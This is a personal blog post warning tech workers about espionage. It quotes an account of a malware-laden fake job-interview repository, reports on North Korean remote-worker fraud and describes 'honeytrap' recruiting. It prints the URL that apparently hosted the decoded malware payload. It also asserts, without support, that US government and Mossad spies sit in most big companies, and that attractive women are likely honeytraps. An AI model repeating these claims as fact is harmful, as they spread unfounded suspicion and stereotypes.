Type what you’re looking for and press Enter.

Watch out for hackers and spies during work

December 21st, 2025
No Comments

A while back I blogged about how the criminal US Government has spies in major (tech) companies. It was clear from that post that if you work at Big Tech companies or companies doing any kind of sensitive work, some of your co-workers are probably connected to 3-letter agencies such as the NSA, CIA and even Mossad. These days the problem is only getting worse; let’s take a look at some examples.

If you’re being approached by job recruiters, you might want to be extra careful as they might be spies or hackers. They might ‘simply’ be hackers who’re trying to get into your own system to steal your cryptocurrency, but they might also be hackers who’re trying to hack into the company that you’re working for, or one or more of your clients through you (for example if you have access to your client’s IT infrastructure). One way in which they can try to do that is by getting you to run certain software on your system or opening certain files (such as PDF files containing malicious content).

Here’s as example from David Didda, “How I Almost Got Hacked By A ‘Job Interview'” (October 15th 2025):

Last week, I got a LinkedIn message from Mykola Yanchii. Chief Blockchain Officer at Symfa. Real company. Real LinkedIn profile. 1,000+ connections. The works. The message was smooth. Professional. “We’re developing BestCity, a platform aimed at transforming real estate workflows. Part-time roles available. Flexible structure.”

Before our meeting, Mykola sent me a “test project” — standard practice for tech interviews. A React/Node codebase to evaluate my skills. 30-minute test. Simple enough. The Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock photo of a woman with a tablet standing in front of a house. You know the one. Here’s where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I did what lazy developers do — I started poking around the codebase without running it first.

Usually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush. I spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. Ready to run it and show my work. Then I had one of those paranoid developer moments.

Before hitting npm start, I threw this prompt at my Cursor AI agent: “Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn’t be reading, accessing crypto wallets etc.”

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty: […] Obfuscated. Sneaky. Evil. And 100% active — embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything — crypto wallets, files, passwords, your entire digital existence. Here’s the kicker: the URL died exactly 24 hours later. These guys weren’t messing around – they had their infrastructure set up to burn evidence fast.

Here’s what made this so dangerous:

Urgency: “Complete the test before the meeting to save time.”

Authority: LinkedIn verified profile, real company, professional setup.

Familiarity: Standard take-home coding test. Every developer has done dozens of these.

Social Proof: Real company page with real employees and real connections.

I almost fell for it. And I’m paranoid about this stuff.

In this case the ‘recruiter’ tried to get their target to run a malicious program disguised as a skill assessment project on the target’s own computer. But quite often they can also just send malicious images and documents, for example, company profiles in PDF format, and insist on you opening them immediately while you’re being ‘interviewed’ by them.

Then there’s also the problem of fake remote workers who’re hackers and spies trying to get into companies in other countries to gather intelligence and steal company assets. Here’s from Forbes, “North Korean Hackers Pose As Remote Workers To Infiltrate U.S. Firms” (April 25th 2025):

Even cybersecurity companies aren’t immune. In mid-2024, KnowBe4, a global leader in security awareness training, hired a seemingly well-qualified remote software engineer. The candidate passed a rigorous background check, provided references, attended multiple video interviews, and even submitted a professional photo.

But just weeks into the role, their security team discovered malware being installed on the employee’s company-issued laptop. The engineer wasn’t who he claimed to be. He was a North Korean threat actor using a stolen U.S. identity and an AI-enhanced image to dupe one of the most security-conscious companies in the world.

That incident, once viewed as an outlier, now appears to be part of a much larger and more coordinated national security threat. Just weeks later, in January 2025, another indictment charged two additional North Korean nationals and three international facilitators — including two U.S. citizens — with similar fraud. That group allegedly infiltrated 64 U.S. companies, laundering more than $866,000 through just ten of them. One of the American defendants reportedly ran a “laptop farm” out of his North Carolina home, receiving company-issued devices and installing remote access software so North Korean workers could appear to be U.S.-based hires.

The methods used by these operatives are sophisticated and increasingly difficult to detect:

  • Stolen or forged identities, including U.S. passports
  • Phony resumes and fake company websites to establish legitimacy
  • AI-generated or enhanced photographs (deepfakes)
  • Fabricated LinkedIn-style profiles
  • Proxy interview participants paid to impersonate fake applicants
  • Remote device “laptop farms” in the U.S. to spoof local logins

Hiring fraud has evolved. It’s no longer limited to resume inflation or fake degrees. It now involves state-sponsored threat actors, synthetic identities, and cross-border data laundering. The stakes? Intellectual property theft, regulatory liability, sanctions exposure, and brand-damaging extortion. And it’s not just the “big names” being targeted. The DOJ confirmed that dozens of U.S. companies, across sectors, have unknowingly employed Democratic People’s Republic of Korea (DPRK) operatives, sometimes for years.

Honeytrap

And then there’s the very ancient method of using attractive women as honeytraps. Here’s from The Times, “Female spies are waging ‘sex warfare’ to steal Silicon Valley secrets” (October 22nd 2025):

Chinese and Russian operatives are using “sex warfare” to seduce and spy on Silicon Valley professionals, industry insiders have told The Times. James Mulvenon, the chief intelligence officer of Pamir Consulting, which provides risk assessments for American companies investing in China, said he was one of the many men recently targeted by foreign seductresses hoping to gain access to US tech secrets. “I’m getting an enormous number of very sophisticated LinkedIn requests from the same type of attractive young Chinese woman,” said Mulvenon. “It really seems to have ramped up recently.”

Both Russia and the CCP are using ordinary citizens — investors, crypto analysts, businessmen and academics — to target their American counterparts, rather than trained agents, making the espionage harder to spot. “We’re not chasing a KGB agent in a smoky guesthouse in Germany anymore,” said one senior US counterintelligence official. “Our adversaries — particularly the Chinese — are using a whole-of-society approach to exploit all aspects of our technology and Western talent.”

One former counterintelligence official, who now helps Silicon Valley founders divest their foreign investments, said he recently investigated the case of one “beautiful” Russian woman who worked at an aerospace company and married an American colleague. He discovered that she had gone to a modelling academy in her twenties but later attended a “Russian soft-power school” before disappearing for a decade and re-emerging in the US as a cryptocurrency expert. “But she doesn’t stay in crypto,” the ex-official said. “She is trying to get to the heights of the military-space innovation community. The husband’s totally oblivious.”

“Showing up, marrying a target, having kids with a target — and conducting a lifelong collection operation, it’s very uncomfortable to think about but it’s so prevalent,” he continued. “If I wanted to be out of the shadows, I’d write a book on it.”

There’s a popular meme doing the rounds on the internet recently around the idea that if your girlfriend is very beautiful — and especially when she’s out of your league so to speak — she’s probably a honeytrap.

You might want to be extra paranoid when you get approached by women these days and be extra careful with sharing any kind of information with them. It’s probably best to set boundaries and not let them into your personal and professional life. As I mentioned about honey traps in a previous post, it helps to have unpredictable daily routines and also to not share much personal information about yourself (online) that can be used to target you.

Meta

This entry was published on Sunday, December 21st, 2025 at 8:51 am by Karel Donk and is filed under Information Technology Law Politics Programming . You can use the permanent link to bookmark and/or share it.

Comments

There are 0 responses. Follow any responses to this post through its comments RSS feed. You can leave a response, or trackback from your own site.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

The Eye of Providence

Subscribe to blog via Email

Enter your email address to subscribe to this blog and receive notifications of new posts by email. Note that this subscription is different from my newsletter.